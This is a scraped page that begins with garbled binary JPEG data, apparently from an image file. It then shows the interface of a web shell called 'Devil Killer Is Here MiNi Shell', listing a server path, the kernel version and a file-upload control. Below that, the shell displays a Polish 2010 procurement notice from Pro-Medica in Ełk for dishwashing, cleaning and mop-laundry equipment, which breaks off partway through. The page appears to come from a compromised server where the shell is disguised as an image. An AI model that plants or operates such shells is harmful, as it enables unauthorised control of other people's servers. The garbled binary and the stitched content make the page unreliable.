JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100429/103267-N-2010.html

<p class="kh_header"><b>Ełk: Dostawa  sprzętu gospodarczego  na potrzeby Pro-Medica w Ełku Sp. z o. o.</b><br>
<b>Numer ogłoszenia: 103267 - 2010; data zamieszczenia: 29.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "Pro-Medica" w Ełku Sp. z o.o. , ul. Baranki 24, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 087 621 96 50, faks 087 621 96 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.promedica.elk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Pro-Medica w Ełku sp. z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  sprzętu gospodarczego  na potrzeby Pro-Medica w Ełku Sp. z o. o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Lp.
Nazwa artykułu
Cechy, właściwości,zakres
ilość
Grupa I
1
Zmywarka do naczyń
-Urządzenie do mycia naczyń stołowych o średnicy 310mm, posiadająca funkcję wyparzania w temperaturze nie niższej niż 90°C, cykl pracy ok. 120s, wyposażone: w 2 ramiona myjące wykonane ze stali nierdzewnej, w pełni zautomatyzowany proces mycia, izolacja termiczna i akustyczna preferowane są podwójne ścianki zmywarki, wyłącznik drzwiowy zabezpieczający przed włączeniem przy otwartych drzwiczkach, czytelny panel sterowania, pojemność zbiornika na wodę: około 25 l, wyposażony w system dozujący środki myjące i płuczące, odpływ grawitacyjny, kosz na sztućce, kosz do talerzy, kosz do kubków, kosz na tace.
- zmiękczacz uzdatniacz wody do ww zmywarki, pojemność minimum 12l, wykonany ze stali nierdzewnej, regenerowany solą niejodowaną, zapobiegający powstawaniu kamienia i wapnia
- Podstawa pod zmywarkę wykonana ze stali nierdzewnej, pasująca pod proponowaną zmywarkę, przybliżone wymiary 590x530x433 wysokość nie mniejsza niż , podstawa powinna posiadać 1-2 półki na kosze do mycia
- Stół wyładowczy ze stali nierdzewnej z półką, wymiary stołu: 800x700x800 do zmywarki, wykonany ze stali nierdzewnej kwasoodpornej z 1 półką;
- Regał gretingowy ze stali nierdzewnej, z 4-5 półkami, wymiary: 1200x500x1800, wykonany ze stali nierdzewnej kwasoodpornej.
1 kpl
Grupa II
1
Zlew z oprzyrządowaniem
- Stół ze zlewem 2-komorowym i drzwiczkami zamykanymi na klucz, z wyciętym otworem na młynek w lewej komorze, włącznik młynka umiejscowiony z przodu. Stół ma być przygotowany do podłączenia baterii. Wymiary 1200x700x800+50mm, wykonany ze stali nierdzewnej kwasoodpornej.
- Bateria sztorcowa 2-kolumnowa z wylewką i spryskiwaczem na wysięgniku, wykonana ze stali nierdzewnej.
- Młynek koloidalny z wyłącznikiem pneumatycznym umożliwiającym uruchamianie młynka mokrymi rękoma, bez obawy o porażenie prądem elektrycznym. Rozdrabniacz odpadów organicznych służący do mielenia takich odpadów jak: obierzyny ziemniaków, kawałki ryb, skorupki jaj, wyciśnięte cytryny i inne owoce, fusy po kawie i herbacie oraz inne miękkie odpady po posiłkach. Montowany bezpośrednio pod otworem zlewu. Komora rozdrabniacza wykonana ma być z odpornego na uderzenia tworzywa sztucznego, tarcza rozdrabniacza oraz pierścień rozdrabniający wykonane ze stali nierdzewnej.

1 Kpl
Grupa III
1
Urządzenia związane z przygotowaniem posiłków
- Termometr - pirometr bezkontaktowy na podczerwień, dodatkowo może być wyposażony w sondę do żywności o zakresie temperatur: -40 do +200st.C +20 z ważnym certyfikatem kalibracji. Należy załączyć świadectwo certyfikat. Termometr musi spełniać zasady systemu HACCP
- Chłodziarka do próbek żywności wyposażona w termometr (preferowany termometr z wyświetlaczem elektronicznym, urządzenie wykonane z blachy nierdzewnej, może być malowane proszkowo białe, opływowy kształt, brak ostrych kantów. Drzwi chłodziarki mają posiadać wbudowany zamek na klucz, wewnętrzna przestrzeń chłodziarki zawierać ma minimum 9 kaset zbiorczych (po trzy na każdą dobę) opisanych nazwami posiłków. Kasety mają być wyposażone w pojemniki jednostkowe (minimum 9 pojemników o poj. min 250ml na szufladę). Na kasetach powinna być możliwość zapisania zmywalnym markerem daty pobrania próbek (zmywalny marker flamaster oraz gąbka do ścierania w załączeniu). Zasilanie chłodziarki 230V.
- Pojemnik na odpadki pokonsumpcyjne poj. ok. 40L+10 wymiary: 60x40+5cm (wys x średnica), otwierany bez użycia rąk (wyposażony w pedał nożny), wykonany ze stali nierdzewnej. Wszystkie powierzchnie wykończone w sposób umożliwiający łatwe utrzymanie czystości (bez ostro zakończonych krawędzi)

1 Kpl
Grupa IV
1
Pojemik termoizolacyjny
Termos przeznaczony do transportu i przechowywania gorących lub zimnych potraw. Zbudowany z podwójnych ścianek polietylenowych wypełnionych izolacyjną pianką poliuretanową. Wykazujący bardzo dobre właściwości termoizolacyjne, drzwiczki usytuowane z boku albo przodu wyposażone w silikonową uszczelkę oraz 2 klamry zamykające. Pojemnik wyposażony w prowadnice oraz w wygodne uchwyty ułatwiające transport. Przystosowany do pracy w temperaturach od -20°C do 100°C. Pojemność:  2 x GN 1/1 gł. 200mm (Zamawiający dopuszcza również pojemność 1 x GN 1/1 gł. 200 mm + 1 x GN 1/1 gł. 100 mm)

2 Szt.
Grupa V
1
Zestaw do sprzątania I
- 1 polerka - Maszyna elektryczna jednotarczowa - wysokoobrotowa. Stosowana do metody polerowania Ultra High Speed. Prędkość obrotowa maszyny min. 1200 ob./min. Moc urządzenia 1100 W ,  Maszyna zasilana poprzez przewód elektryczny dł. min. 20 m. Masa maszyny - max 30+5 kg ; szerokość robocza 450-500 mm . Maszyna wykonana z aluminium odpornego na działanie alkaliów. Urządzenie musi posiadać uchwyt regulowany do prowadzenia maszyny -  siłownik hydrauliczny eliminuje wibracje i ułatwia płynną pracę. Urządzenie wyposażone w uchwyt do padów.
- 1 Odkurzacz profesjonalny elektryczny na kurz i wodę. Zbiornik wykonany ze stali nierdzewnej o pojemności roboczej 25-30 l. Moc odkurzacza - min. 1200W .Zasilanie przewodowe - przewód elektryczny min. 10 m. Urządzenie wyposażone w zawór bezpieczeństwa informujący o całkowitym napełnieniu zbiornika wodą. Waga odkurzacza max 20 kg, poziom hałasu max 70 db. Urządzenie ma być wyposażone w zestaw do pracy na mokro tj. wąż  dł. Min. 3 m, ssawki oraz ewentualne filtr zmywalne. Odkurzacz powinien umożliwiać wykonywanie sprzątania na sucho. 
Gwarancja na zestaw - minimum 12 miesięcy

1 zestaw
Grupa VI
1
Zestaw do sprzątania 
Wózek serwisowy i elementy dodatkowe powinny być wykonane z materiałów (stal miękka, ocynkowana i lakierowana przezroczystym lakierem proszkowym, tworzywo sztuczne typu polipropylen, poliamid, termoutwardzalny elastomer) lekkich, trwałych opornych na zabrudzenia, zarysowania i pęknięcia przy uderzeniu oraz opornych na działanie środków chemicznych. Ze składaną ramą/stelażem z dwoma uchwytami na worki na odpady o pojemności 70l, wraz z systemem do mocowania tych worków oraz dwiema pokrywami na zawiasach, oznaczonymi dla rozróżnienia kolorem czerwonym i niebieskim, demontowaną podstawę podtrzymująca worki na odpady, platforma/podstawa jezdna wykonana z tworzywa sztucznego, o wymiarach: długość 50+5cm i szerokość  60+5cm, osadzona, na co najmniej 4 kółkach gumowych o średnicy 125+5mm, wykonanych z materiałów gładkich umożliwiających mycie i dezynfekcję, wysokość wózka 100+5cm, dwa uchwyty do kija oraz podstawy do postawienia mopa - uchwyty i podstawy muszą być demontowalne, - Wózek musi mieć możliwość rekonfiguracji, poprzez odjęcie lub dodanie wiader i dołożenie do zestawu dodatkowych kuwet na wstępne przygotowanie mopów. Wózek powinien być wyposażony w:
- 1 uchwyt i podstawę na mopa z kijem 
- 1 drążek aluminiowy z uchwytem mopa pasującym do mopów nakładek wyszczególnionych w pozycji poniżej (kij ma być teleskopowy aluminiowy o długości 100-180+20 cm z antypoślizgową nakładką na rękojeści, Uchwyt mopa powinien cechować się łatwością utrzymania wysokiego stanu higienicznego (mało załamków i miejsc trudnodostępnych), być wykonany z odpornego na odkształcenia i zarysowania tworzywa sztucznego;
- 3 wiaderka o pojemności 6 l, z podziałką oraz demontowalnymi pokrywami, oznaczone dla rozróżnienia kolorem czerwonym, niebieskim, żółtym,
- 1 tace - półkę na akcesoria wykonane z tworzywa sztucznego,
- 4 kuwety/szuflady o pojemności 15l z demontowalnymi szczelnymi pokrywami,, wykonane z polipropylenu, każda oznaczona dla rozróżnienia kolorem czerwonym, niebieskim, zielonym lub żółtym, kuwety i tacki umiejscowione powinny być, na wspornikach - szynach, których wysokość na ramie wózka może być dowolnie umiejscowiona, muszą się wysuwać z szyn, dając łatwy dostęp do akcesoriów równocześnie zapewniając ich blokowanie się podczas wysuwania tak, aby nie wysunęły się z szyn całkowicie,
- 20szt. - Dwustronny mop z mikrowłókien (mikrofazy), przystosowany do mocowania jedno-kieszeniowego, na uchwycie o długości 45+5cm dłuższa krawędź i 40 cm krótsza, szerokości 10+2 cm, posiadający dobre właściwości czyszczące bez pozostawiania smug i kłaczków, cechujący się wysokimi zdolnościami do zbierania zarodników bakteryjnych (Pseudomonas aeruginosa i Staphylococcus ureus) z czyszczonej powierzchni (min 99,92% z neutralnym środkiem myjącym, stosowanym w stężeniu 1% i ilości cieczy roboczej nie większej niż 200ml na mopa, czyszcząc wykładzinę wykonaną z PCW). Wykonane w 100% z materiału syntetycznego (mieszanki włókien poliestru) cechujący się: odpornością na rozerwanie, dobrym wchłanianiem kurzu, absorpcją wody na poziomie min. 400ml. Gwarantowana wytrzymałość, bez zmiany właściwości materiału,  co najmniej 600 (preferowana większa ilość) cyklach prania przeprowadzonych w profesjonalnej pralnicy, w temperaturze między 60oC-95oC. Wytrzymały na środki dezynfekcyjne do prania bielizny szpitalnej. Wymagane potwierdzenie jednostki badawczej o skuteczności usuwania szczepów bakteryjnych z powierzchni. W celu potwierdzenia spełnienia opisu należy załączyć 1 sztukę nakładki (bezzwrotną)

1 zestaw
2
Zestaw do sprzątania 
Wózek serwisowy i elementy dodatkowe powinny być wykonane z materiałów (stal miękka, ocynkowana i lakierowana przezroczystym lakierem proszkowym, tworzywo sztuczne typu polipropylen, poliamid, termoutwardzalny elastomer) lekkich, trwałych opornych na zabrudzenia, zarysowania i pęknięcia przy uderzeniu oraz opornych na działanie środków chemicznych. Ze składaną ramą/stelażem z dwoma uchwytami na worki na odpady o pojemności 70l, wraz z systemem do mocowania tych worków oraz dwiema pokrywami na zawiasach, oznaczonymi dla rozróżnienia kolorem czerwonym i niebieskim, demontowaną podstawę podtrzymująca worki na odpady, platforma/podstawa jezdna wykonana z tworzywa sztucznego, o wymiarach: długość 50+5cm i szerokość  60+5cm, osadzona, na co najmniej 4 kółkach gumowych o średnicy 125+5mm, wykonanych z materiałów gładkich umożliwiających mycie i dezynfekcję, wysokość wózka 100+5cm, dwa uchwyty do kija oraz podstawy do postawienia mopa - uchwyty i podstawy muszą być demontowalne, - Wózek musi mieć możliwość rekonfiguracji, poprzez odjęcie lub dodanie wiader i dołożenie do zestawu dodatkowych kuwet na wstępne przygotowanie mopów. Wózek powinien być wyposażony w:
- 2 uchwyty i podstawę na mopa z kijem 
- 2 drążki aluminiowe z uchwytem mopa pasującym do mopów nakładek wyszczególnionych w pozycji poniżej (kij ma być teleskopowy aluminiowy o długości 100-180+20 cm z antypoślizgową nakładką na rękojeści, Uchwyt mopa powinien cechować się łatwością utrzymania wysokiego stanu higienicznego (mało załamków i miejsc trudnodostępnych), być wykonany z odpornego na odkształcenia i zarysowania tworzywa sztucznego;
- 3 wiaderka o pojemności 6 l, z podziałką oraz demontowalnymi pokrywami, oznaczone dla rozróżnienia kolorem czerwonym, niebieskim, żółtym,
- 1 tace - półkę na akcesoria wykonane z tworzywa sztucznego,
- 4 kuwety/szuflady o pojemności 15l z demontowalnymi szczelnymi pokrywami,, wykonane z polipropylenu, każda oznaczona dla rozróżnienia kolorem czerwonym, niebieskim, zielonym lub żółtym, kuwety i tacki umiejscowione powinny być, na wspornikach - szynach, których wysokość na ramie wózka może być dowolnie umiejscowiona, muszą się wysuwać z szyn, dając łatwy dostęp do akcesoriów równocześnie zapewniając ich blokowanie się podczas wysuwania tak, aby nie wysunęły się z szyn całkowicie,
- 100szt. - Dwustronny mop z mikrowłókien (mikrofazy), przystosowany do mocowania jedno-kieszeniowego, na uchwycie o długości 45+5cm dłuższa krawędź i 40 cm krótsza, szerokości 10+2 cm, posiadający dobre właściwości czyszczące bez pozostawiania smug i kłaczków, cechujący się wysokimi zdolnościami do zbierania zarodników bakteryjnych (Pseudomonas aeruginosa i Staphylococcus ureus) z czyszczonej powierzchni (min 99,92% z neutralnym środkiem myjącym, stosowanym w stężeniu 1% i ilości cieczy roboczej nie większej niż 200ml na mopa, czyszcząc wykładzinę wykonaną z PCW). Wykonane w 100% z materiału syntetycznego (mieszanki włókien poliestru) cechujący się: odpornością na rozerwanie, dobrym wchłanianiem kurzu, absorpcją wody na poziomie min. 400ml. Gwarantowana wytrzymałość, bez zmiany właściwości materiału,  co najmniej 600 (preferowana większa ilość) cyklach prania przeprowadzonych w profesjonalnej pralnicy, w temperaturze między 60oC-95oC. Wytrzymały na środki dezynfekcyjne do prania mopów/bielizny szpitalnej. Wymagane potwierdzenie jednostki badawczej o skuteczności usuwania szczepów bakteryjnych z powierzchni. W celu potwierdzenia spełnienia opisu należy załączyć 1 sztukę nakładki (bezzwrotną)
1 kpl.
Grupa VII
1
Pralnica do mopów
Pralnica ma być przystosowana do prania mopów (nakładek bawełnianych), wyposażona w specjalne wzmocnione grzałki zapobiegające przepalaniu przez splątane włókna z mopów, urządzenie ma być przystosowane do łatwego czyszczenia grzałek i bębna. Solidna montowana konstrukcja z mocna ramą ze stali galwanizowanej (nierdzewnej) z dużym wyświetlaczem z jednym pokrętłem dla łatwego wyboru programu:
wybór języka (preferowany język polski)
2 szybkie klawisze startu dla często używanych programów (możliwość modyfikowania programu)
optymalizacja programów prania pod różnym kątem: Ekonomika, Wydajność i Czas
4 komorowy dozownik detergentów do ręcznego dozowania proszków lub płynów oraz przystawka do automatycznego dozowania
Szerokie otwarcie drzwi dla łatwego załadunku i wyładunku
Stal nierdzewna i galwanizowana we wszystkich istotnych częściach dla wysokiej odporności na rdzę
zawór spustowy sterowany elektrycznie (nie ciśnieniem wody)
Wielkość załadunku min. 20 kg, objętość bębna min 180 litrów, prędkość wirowania min. 450 obr/min, współczynnik odwirowania min. G = 81,podgrzew elektryczny, przyłącze elektryczne 400V 3N
gwarancja minimum 12 miesięcy dla zastosowań profesjonalnych (preferowany dłuższy okres)

1 kpl.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 42.95.90.00-3, 39.22.10.00-7, 39.22.40.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia Wykonawcy o spełnieniu warunków udziału w Postępowaniu z art. 22 Prawa zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia Wykonawcy o spełnieniu warunków udziału w Postępowaniu z art. 22 Prawa zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia Wykonawcy o spełnieniu warunków udziału w Postępowaniu z art. 22 Prawa zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia Wykonawcy o spełnieniu warunków udziału w Postępowaniu z art. 22 Prawa zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia Wykonawcy o spełnieniu warunków udziału w Postępowaniu z art. 22 Prawa zamówień publicznych;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Do oferty proszę załączyć ulotki informacyjne od producentów w/w sprzętu celem potwierdzenia właściwości oferowanego sprzętu.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
